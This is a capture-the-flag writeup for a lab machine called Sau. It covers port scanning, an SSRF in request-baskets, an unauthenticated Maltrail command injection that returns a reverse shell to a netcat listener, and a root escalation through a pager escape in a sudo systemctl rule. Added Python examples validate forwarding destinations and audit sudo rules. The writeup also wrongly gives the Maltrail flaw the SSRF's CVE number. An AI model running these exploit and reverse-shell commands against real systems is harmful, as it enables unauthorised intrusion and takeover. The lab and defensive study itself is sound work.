Sau writeup
30 July, 2023 00:00 CEST
Enumeration
nmap -A -p- -T4 10.10.11.224
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
|   256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_  256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sun, 30 Jul 2023 20:04:04 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     400 Bad Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sun, 30 Jul 2023 20:03:38 GMT
|     Content-Length: 27
|     <a href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sun, 30 Jul 2023 20:03:38 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.93%I=7%D=7/30%Time=64C6C21A%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;\
SF:x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Sun,\x2030\x20Jul\x20
SF:2023\x2020:03:38\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/w
SF:eb\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
SF:20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x202
SF:00\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Sun,\x2030\x20Jul\x20
SF:2023\x2020:03:38\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(K
SF:erberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
SF:equest")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Sun,\x2030\x20Jul\x202023\x2020:04:04\x20GMT\r
SF:\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20nam
SF:e\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$\
SF:n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
By opening the site http://10.10.11.224:55555/web I see that it hosts request-baskets version 1.2.1, which is vulnerable to CVE-2023-27163. The exploit for this SSRF is https://github.com/entr0pie/CVE-2023-27163
I use the exploit to access the local resources listed by nmap (the filtered ports 8338 and 80) through the proxy offered by request-baskets:
./CVE-2023-27163.sh "http://10.10.11.224:55555" "http://127.0.0.1:8338"
./CVE-2023-27163.sh "http://10.10.11.224:55555" "http://127.0.0.1:80"
NOTE: for the exploit to actually work you need to visit/query the URL that request-baskets returns (e.g. http://10.10.11.224:55555/sflzwb).
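The SSRF above works because the application forwards requests to a user-supplied destination without restricting where that destination may point, so a basket can reach the loopback ports that nmap reports as filtered from outside. As an added example (not request-baskets' own code and not part of the exploit repository linked above), here is the destination check in Python that a forwarding feature of this kind needs: it rejects loopback, private, link-local and IPv4-mapped targets, and takes an injectable resolver so it can be exercised offline. The function names, the blocked-range additions and the sample hostnames are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (not request-baskets' own code): a destination check for a
# "forward to this URL" feature. Names and sample hostnames are assumptions.

BLOCKED_HOSTNAMES = {"localhost", "localhost.localdomain"}

# Ranges that the ipaddress module does not flag as private but that are still
# internal from a forwarding proxy's point of view (CGNAT shared space).
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]


def is_internal_address(ip) -> bool:
    """True if `ip` (an IPv4Address or IPv6Address) points back at the host or its network."""
    # An IPv4-mapped IPv6 literal such as ::ffff:127.0.0.1 must be judged as 127.0.0.1.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_unspecified
        or ip.is_reserved
        or any(ip in net for net in EXTRA_BLOCKED)
    )


def resolve_host(host: str) -> list:
    """Default resolver: every address the hostname maps to (A and AAAA records)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def forward_url_is_safe(url: str, resolver=resolve_host) -> tuple:
    """Return (True, "ok") for an allowed destination, otherwise (False, reason).

    `resolver` is injectable so the check can run without DNS. The check is made
    when the destination is configured; a deployment should also re-check (or pin)
    the resolved address at request time so that DNS rebinding cannot bypass it.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if host.lower() in BLOCKED_HOSTNAMES:
        return False, f"{host!r} is the local machine"
    try:
        candidates = [ipaddress.ip_address(host)]          # literal IPv4/IPv6
    except ValueError:
        try:
            candidates = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
        if not candidates:
            return False, f"{host!r} resolves to nothing"
    for ip in candidates:
        if is_internal_address(ip):
            return False, f"{host!r} resolves to internal address {ip}"
    return True, "ok"


# Constructed resolver table so the demo runs offline (not real DNS data).
DEMO_DNS = {
    "intranet.example": ["10.0.0.5"],
    "www.example.org": ["93.184.216.34"],
}


def demo_resolver(host: str) -> list:
    return DEMO_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in (
        "http://127.0.0.1:8338",        # the loopback target reached in the writeup
        "http://[::ffff:127.0.0.1]/",   # same host, disguised as an IPv6 literal
        "http://intranet.example/",     # public-looking name, private address
        "https://www.example.org/hook", # the only one that should pass
    ):
        print(candidate, forward_url_is_safe(candidate, demo_resolver))
```

Rejecting by resolved address rather than by hostname string is what matters here: a hostname that looks external but resolves to 10.0.0.5 is refused just like the literal 127.0.0.1, and the IPv4-mapped form is normalised before the loopback test.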
Opening the returned URL in the browser shows that in both cases Maltrail version 0.53 is hosted: in the first case (port 8338) the page seems not to work because of broken CSS, while in the second case (port 80) you see the login screen. This specific version is vulnerable to CVE-2023-27163. The exploit for this unauthenticated RCE is: https://github.com/spookier/Maltrail-v0.53-Exploit-
I listen with netcat on port 4444:
nc -lnvp 4444
python3 exploit.py $(ifconfig tun0 | grep inet | head -n 1 | awk '{ print $2 }') 4444 http://10.10.11.224:55555/sflzwb/login
Bingo! I got a reverse shell as the user puma.
Privesc puma
I get a better shell with:
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
I can become root very simply via: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#spawn-shell-in-the-pager
Another reference: https://gtfobins.github.io/gtfobins/systemctl/
systemctl status shows its output through a pager, and at the pager prompt I type:
!sh
So if I can run systemctl status foo as root, I can spawn another shell inside it as root!
NOTE: it's exactly the same for vim: https://gtfobins.github.io/gtfobins/vim/
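The sudo rule above is dangerous not because of systemctl itself but because systemctl status hands its output to a pager that accepts shell escapes. As an added example, not from the writeup or from the references it links, here is a small Python audit that parses the text sudo -l prints, flags NOPASSWD rules whose command ends up in a pager or editor, and prints the exact-match sudoers line that takes the pager out of the picture. The list of pager-spawning binaries is a hypothetical starting set; the sample input is the sudo -l output quoted above.

```python
import re
import shlex

# Added example, not from the writeup or any tool it links: audit `sudo -l`
# output for rules that can be escaped to a root shell through a pager/editor.

# Hypothetical starting set of binaries that open a pager or editor from which
# "!sh" (or an equivalent escape) yields an interactive shell.
PAGER_SPAWNING = {"systemctl", "journalctl", "less", "more", "man", "vim", "vi", "nano", "git"}

# sudo prints each permitted command as "(RUNAS) [TAG: ...] /path/cmd args".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text: str) -> list:
    """Return [(runas, tags, argv)] for every command rule in `sudo -l` output."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True          # everything before this is Defaults noise
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tagtext, cmd = m.groups()
        tags = [t.strip() for t in tagtext.split(":") if t.strip()]
        rules.append((runas.strip(), tags, shlex.split(cmd)))
    return rules


def audit_sudo_l(text: str) -> list:
    """One finding string per rule that reaches a pager/editor without --no-pager."""
    findings = []
    for runas, tags, argv in parse_sudo_l(text):
        if not argv or argv[0] == "ALL":
            continue                    # "(ALL) ALL" is a different problem entirely
        binary = argv[0].rsplit("/", 1)[-1]
        if binary in PAGER_SPAWNING and "--no-pager" not in argv:
            why = "pager/editor can be escaped to an interactive shell"
            if "NOPASSWD" in tags:
                why += " without a password"
            findings.append(f"({runas}) {' '.join(argv)}: {why}")
    return findings


def hardened_rule(user: str, host: str, argv: list) -> str:
    """Suggest an exact-match sudoers line with the pager disabled.

    Assumption: the command honours --no-pager (systemctl and journalctl do).
    sudoers matches arguments literally, so the user can only run this exact line.
    """
    return f"{user} {host} = (root) NOPASSWD: {' '.join(argv + ['--no-pager'])}"


# The `sudo -l` output quoted in the writeup (backslashes doubled for the Python literal).
SAMPLE = """\
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
"""

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print("FINDING:", finding)
    for _runas, _tags, argv in parse_sudo_l(SAMPLE):
        print("SUGGESTED:", hardened_rule("puma", "sau", argv))
```

Because env_reset is already in effect, pager-related environment variables do not survive the sudo boundary, so forcing --no-pager in the rule is what removes the escape; re-running the audit on the suggested line returns no findings.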